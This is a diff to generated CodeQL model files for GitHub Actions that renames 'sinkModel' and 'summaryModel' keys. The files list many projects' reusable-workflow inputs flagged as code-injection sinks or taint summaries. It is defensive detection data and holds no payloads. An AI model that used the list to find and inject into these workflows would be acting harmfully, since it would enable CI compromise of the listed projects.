pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04f..efbf050ddc96 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc26..9860bd3ab92f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9d..c160c29f6f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f8..910715eece07 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] @@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591a..f04e67670d3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e185..3d5fa057987c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a0..31d0e691e7f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a3..5f9da314f90b 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e1..7ae494adb2b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b2..dce969719d29 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab169..cd5d5ff7d0fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e90698..fd17e601d805 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7f..bed40dce4298 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386c..62a12e471389 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932fe..7491c4f951af 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506a..1876f1146cbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d39..4a8534429f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e092..ecac3f22f851 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f485510..ffc4193edbf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec48112..93b29308ff27 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e71..c5965c5d8efc 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b4850831911..1fc5159e55a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f4..bce14a98edd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f04..0439d6e1d4ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762f..357e11b3c0ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f577..4d3ea1e91562 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e439939..44b905cab672 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f0..192d975ea573 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf881..627fca5d3ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1ad..4d4fd0f229ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de2..1ceacd2f1c0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb92..ba0f5c06a672 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec5..3c8f11dd0cd8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 6d6f9e177402..b7c00fff318d 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262ff..5a129691bc5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b1..bd07156d06b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec224..b029e3417102 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a95..995e692e4945 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0ae..db325a06baa5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255d..2c91ab62b0c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728d..8fdf39a0bbcf 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a99..00fceb9c7bd2 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml 